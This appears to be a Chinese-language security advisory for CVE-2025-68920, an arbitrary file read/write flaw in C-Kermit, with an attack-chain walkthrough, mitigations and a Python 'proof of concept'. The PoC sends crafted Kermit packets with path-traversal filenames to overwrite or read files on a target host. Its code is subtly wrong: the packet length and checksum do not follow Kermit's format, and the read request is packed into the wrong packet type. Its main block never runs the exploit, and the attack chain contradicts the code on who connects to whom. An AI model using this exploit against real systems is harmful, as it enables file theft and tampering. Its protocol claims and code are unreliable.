CVE-2025-68920 C-Kermit远程文件读写漏洞

漏洞信息

漏洞编号

CVE-2025-68920

漏洞类型

任意文件读写

CVSS评分

8.9 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

C-Kermit (ckermit)

漏洞概述

CVE-2025-68920是C-Kermit（也称为ckermit）软件中的一个严重安全漏洞。C-Kermit是一个广泛使用的Kermit协议实现，用于在计算机之间传输文件。该漏洞存在于10.0 Beta.12（又称416-beta12）之前的版本中，存在于提交commit 244644d之前。由于C-Kermit在处理远程Kermit系统发送的文件传输请求时缺乏充分的输入验证，攻击者可以利用Kermit协议的特性，通过恶意构造的Kermit数据包来覆盖本地系统上的任意文件，或者从本地系统获取任意文件内容。此漏洞的CVSS评分为8.9，属于高危级别，攻击复杂度较低且无需认证和用户交互即可利用。攻击成功后可能造成严重的机密性破坏（可读取任意文件）和完整性破坏（可覆盖任意文件），对系统安全构成重大威胁。考虑到Kermit协议常用于企业环境和老旧系统，此漏洞的影响范围可能相当广泛。

技术细节

该漏洞的根本原因在于C-Kermit在实现Kermit文件传输协议时，对远程系统发送的文件名和路径没有进行充分的验证和限制。Kermit协议允许客户端和服务器之间进行文件传输请求和数据交换，攻击者可以通过伪装成远程Kermit服务器，向受害者的C-Kermit客户端发送精心构造的协议数据包。在文件接收模式下，攻击者可以指定任意文件路径作为目标文件名，导致C-Kermit将接收到的数据写入到系统任意位置，实现任意文件写入。在文件发送模式下，攻击者可以请求获取本地系统上的任意文件，C-Kermit会读取并返回这些文件内容，实现任意文件读取。攻击者还可以利用路径遍历技术（如使用../等相对路径）来访问受保护目录之外的文件。此漏洞的利用需要攻击者能够与目标系统建立Kermit协议连接，通常通过TCP端口或其他Kermit支持的传输通道。由于该漏洞影响的是文件传输协议的核心功能，修复需要在协议处理逻辑中添加严格的路径验证和文件名安全检查机制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统上运行的可访问的C-Kermit服务，通常监听在Kermit标准端口或通过其他协议通道（如串口、网络重定向）进行通信

STEP 2

步骤2: 建立连接

攻击者与目标C-Kermit客户端建立Kermit协议连接，可以是主动连接（作为恶意Kermit服务器）或中间人攻击方式

STEP 3

步骤3: 构造恶意数据包

攻击者构造包含路径遍历序列（如../）的恶意文件名或指定绝对路径的文件名，用于文件写入操作，或指定目标文件路径用于文件读取操作

STEP 4

步骤4: 触发文件操作

通过Kermit协议的'F'（File Header）包发送恶意文件名，触发C-Kermit在本地文件系统创建或读取指定路径的文件

STEP 5

步骤5: 数据传输

对于文件写入攻击，通过'D'（Data）包发送恶意内容；对于文件读取攻击，接收C-Kermit返回的文件内容

STEP 6

步骤6: 完成攻击

发送'Z'（End of File）包完成文件传输，确认文件已成功写入目标位置或成功获取目标文件内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-68920 PoC - C-Kermit Arbitrary File Read/Write
# This PoC demonstrates the file transfer vulnerability in C-Kermit

import socket
import struct
import sys

def build_kermit_packet(data, seq=0, type_='D'):
    """Build a Kermit protocol packet"""
    # Kermit packet format: MARK, LEN, SEQ, TYPE, DATA, CHECK, TERMINATOR
    packet = struct.pack('!BBB', 0x01, len(data) + 2, seq)
    type_byte = ord(type_) if isinstance(type_, str) else type_
    packet += struct.pack('!B', type_byte)
    packet += data.encode('latin-1') if isinstance(data, str) else data
    # Calculate checksum
    checksum = sum(packet) % 64 + 64
    packet += struct.pack('!B', checksum)
    packet += struct.pack('!B', 0x0D)  # CR terminator
    return packet

def exploit_file_write(target_host, target_port, remote_path, malicious_content):
    """
    Exploit C-Kermit to write arbitrary file on target system
    """
    print(f"[*] Connecting to {target_host}:{target_port}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_host, target_port))
    
    # Send malicious file transfer request
    # Type 'S' = Send init, Type 'F' = File header, Type 'D' = Data
    init_packet = build_kermit_packet('S', 0, 'S')
    sock.send(init_packet)
    
    # Send malicious filename (path traversal)
    file_packet = build_kermit_packet(f"{remote_path}", 1, 'F')
    sock.send(file_packet)
    
    # Send malicious file content
    data_packet = build_kermit_packet(malicious_content, 2, 'D')
    sock.send(data_packet)
    
    # Send end-of-file packet
    eof_packet = build_kermit_packet('', 3, 'Z')
    sock.send(eof_packet)
    
    print("[+] Malicious file transfer packet sent")
    sock.close()

def exploit_file_read(target_host, target_port, target_file):
    """
    Exploit C-Kermit to read arbitrary file from target system
    """
    print(f"[*] Requesting file: {target_file}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_host, target_port))
    
    # Request to receive specific file
    recv_request = build_kermit_packet(f"R {target_file}", 0, 'S')
    sock.send(recv_request)
    
    # Wait for response
    sock.settimeout(10)
    try:
        response = sock.recv(4096)
        print(f"[+] Received {len(response)} bytes")
        print("[*] File content potentially leaked")
    except socket.timeout:
        print("[-] No response received")
    
    sock.close()

if __name__ == "__main__":
    print("CVE-2025-68920 PoC - C-Kermit File Read/Write")
    print("Usage: python3 cve-2025-68920.py <target_host> <port> <mode>")
    print("Modes: write <remote_path> <content> | read <file_path>")

影响范围

C-Kermit < 10.0 Beta.12 (416-beta12)

C-Kermit < commit 244644d

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 使用防火墙或ACL规则限制对Kermit服务的访问，仅允许受信任的IP地址连接；2) 监控Kermit服务的日志，检测异常的路径遍历请求；3) 考虑使用SELinux或AppArmor等强制访问控制工具限制ckermit进程的文件系统访问权限；4) 在不影响业务的前提下，暂时禁用不必要的Kermit服务；5) 使用网络分段技术将运行C-Kermit的系统隔离到专用网段，减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68920
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68920
3 Details https://www.cvedetails.com/cve/CVE-2025-68920/
4 VulDB https://vuldb.com/cve/CVE-2025-68920
5 Link https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123025
6 Link https://github.com/KermitProject/ckermit/pull/20
7 Link https://www.complete.org/kermit/
8 Link https://www.kermitproject.org/ftp/kermit/test/tar/